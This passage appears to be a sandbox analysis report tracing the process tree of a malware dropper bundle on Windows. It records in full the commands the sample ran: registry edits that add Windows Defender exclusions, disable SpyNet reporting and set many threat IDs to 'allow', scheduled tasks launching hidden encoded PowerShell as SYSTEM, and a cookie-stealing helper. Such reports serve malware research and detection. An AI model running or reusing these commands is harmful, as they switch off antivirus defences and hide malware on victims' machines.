.\Install.exe /S /site_id "525403"
8⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
PID:2332

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
9⤵
PID:2292

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
10⤵
PID:3104

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
11⤵
PID:388

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
11⤵
PID:672

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
9⤵
PID:2092

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
10⤵
PID:3568

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
11⤵
PID:632

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
11⤵
PID:4708

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gwJPMprkm" /SC once /ST 01:17:14 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
9⤵
- Creates scheduled task(s)
PID:680

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gwJPMprkm"
9⤵
PID:4232

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gwJPMprkm"
9⤵
PID:812

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "booXbIzkEgfNdKvxAC" /SC once /ST 03:23:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\bmtukMK.exe\" j6 /site_id 525403 /S" /V1 /F
9⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:544

C:\Users\Admin\Documents\CRKwonPHVFzqeBlClm1Iu73t.exe
"C:\Users\Admin\Documents\CRKwonPHVFzqeBlClm1Iu73t.exe"
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of AdjustPrivilegeToken
PID:3388

C:\Users\Admin\Documents\tUnZNlDgqXmEiT0buT3X_rM3.exe
"C:\Users\Admin\Documents\tUnZNlDgqXmEiT0buT3X_rM3.exe"
6⤵
- Executes dropped EXE
PID:4388

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4388 -s 444
7⤵
- Program crash
PID:4076

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4388 -s 452
7⤵
- Program crash
PID:3404

C:\Users\Admin\Documents\APx1dX8mWpxezQIu5RiCWSJj.exe
"C:\Users\Admin\Documents\APx1dX8mWpxezQIu5RiCWSJj.exe"
6⤵
- Executes dropped EXE
PID:4976

C:\Users\Admin\Documents\vELNqMqAVRBnkgbGcAWIYzv4.exe
"C:\Users\Admin\Documents\vELNqMqAVRBnkgbGcAWIYzv4.exe"
6⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
PID:3648

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
7⤵
PID:4104

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sotema_4.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:4568

C:\Users\Admin\AppData\Local\Temp\7zSC6AA301D\sotema_4.exe
sotema_4.exe
5⤵
- Executes dropped EXE
PID:1376

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
6⤵
- Executes dropped EXE
PID:4484

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1300

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sotema_3.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:3268

C:\Users\Admin\AppData\Local\Temp\7zSC6AA301D\sotema_3.exe
sotema_3.exe
5⤵
- Executes dropped EXE
- Modifies system certificate store
PID:4720

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4720 -s 1032
6⤵
- Program crash
PID:4788

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sotema_2.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:1668

C:\Users\Admin\AppData\Local\Temp\7zSC6AA301D\sotema_2.exe
sotema_2.exe
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:4736

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sotema_1.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:4348

C:\Users\Admin\AppData\Local\Temp\7zSC6AA301D\sotema_1.exe
sotema_1.exe
5⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies registry class
PID:1416

C:\Windows\SysWOW64\rUNdlL32.eXe
"C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\axhub.dll",axhub
6⤵
- Loads dropped DLL
PID:3712

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3712 -s 604
7⤵
- Program crash
PID:1240

C:\Users\Admin\AppData\Local\Temp\is-9CFP8.tmp\sotema_7.tmp
"C:\Users\Admin\AppData\Local\Temp\is-9CFP8.tmp\sotema_7.tmp" /SL5="$A002C,506127,422400,C:\Users\Admin\AppData\Local\Temp\7zSC6AA301D\sotema_7.exe"
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3172

C:\Users\Admin\AppData\Local\Temp\7zSC6AA301D\sotema_6.exe
C:\Users\Admin\AppData\Local\Temp\7zSC6AA301D\sotema_6.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:372

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3712 -ip 3712
1⤵
PID:524

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 5088 -ip 5088
1⤵
PID:4032

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 4720 -ip 4720
1⤵
PID:3740

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3416 -ip 3416
1⤵
PID:1672

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 196 -p 648 -ip 648
1⤵
PID:4544

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 4388 -ip 4388
1⤵
PID:3260

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1324 -ip 1324
1⤵
PID:224

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 3712 -ip 3712
1⤵
PID:2576

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 3712 -ip 3712
1⤵
PID:3588

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 3416 -ip 3416
1⤵
PID:2368

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 648 -ip 648
1⤵
PID:2576

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4388 -ip 4388
1⤵
PID:620

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1324 -ip 1324
1⤵
PID:1640

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 1324 -ip 1324
1⤵
PID:2152

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 1324 -ip 1324
1⤵
PID:1808

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 1324 -ip 1324
1⤵
PID:2576

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 1324 -ip 1324
1⤵
PID:544

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 1324 -ip 1324
1⤵
PID:388

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 1324 -ip 1324
1⤵
PID:4232

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 4300 -ip 4300
1⤵
PID:3440

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:1500

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
2⤵
PID:4440

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:1116

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:2384

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:540

C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\bmtukMK.exe
C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\bmtukMK.exe j6 /site_id 525403 /S
1⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:2084

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"
2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:3272

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
3⤵
PID:1468

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
4⤵
PID:2352

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
3⤵
PID:1496

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
3⤵
PID:3808

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
3⤵
PID:3428

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
3⤵
PID:112

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
3⤵
PID:1876

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
3⤵
PID:1948

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
3⤵
PID:4240

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
3⤵
PID:3488

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
3⤵
PID:4508

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
3⤵
PID:1508

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
3⤵
PID:1912

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
3⤵
PID:1684

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
3⤵
PID:3184

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
3⤵
PID:4404

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
3⤵
PID:4128

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
3⤵
PID:4456

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
3⤵
PID:5088

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
3⤵
PID:3136

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
3⤵
PID:5056

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
3⤵
PID:5004

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
3⤵
PID:2596

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
3⤵
PID:4940

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
3⤵
PID:5032

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QMuGxDzxU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QMuGxDzxU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YhmfbgEUeceU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YhmfbgEUeceU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\cKaYGDvIdbsNnMDfsrR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\cKaYGDvIdbsNnMDfsrR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\iTBLcazoBHNRC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\iTBLcazoBHNRC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\rYNYBiCjmUUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\rYNYBiCjmUUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\hnkumIqTRwUxQLVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\hnkumIqTRwUxQLVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\RHdUtmclRPrQNqWD\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\RHdUtmclRPrQNqWD\" /t REG_DWORD /d 0 /reg:64;"
2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1352

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QMuGxDzxU" /t REG_DWORD /d 0 /reg:32
3⤵
PID:3888

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QMuGxDzxU" /t REG_DWORD /d 0 /reg:32
4⤵
PID:3216

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QMuGxDzxU" /t REG_DWORD /d 0 /reg:64
3⤵
PID:2760

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YhmfbgEUeceU2" /t REG_DWORD /d 0 /reg:32
3⤵
PID:2156

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YhmfbgEUeceU2" /t REG_DWORD /d 0 /reg:64
3⤵
PID:2960

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cKaYGDvIdbsNnMDfsrR" /t REG_DWORD /d 0 /reg:32
3⤵
PID:2440

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cKaYGDvIdbsNnMDfsrR" /t REG_DWORD /d 0 /reg:64
3⤵
PID:3760

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\iTBLcazoBHNRC" /t REG_DWORD /d 0 /reg:32
3⤵
PID:4688

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\iTBLcazoBHNRC" /t REG_DWORD /d 0 /reg:64
3⤵
PID:4084

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rYNYBiCjmUUn" /t REG_DWORD /d 0 /reg:32
3⤵
PID:1716

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rYNYBiCjmUUn" /t REG_DWORD /d 0 /reg:64
3⤵
PID:3092

C:\Windows\SysWOW64\reg.exe
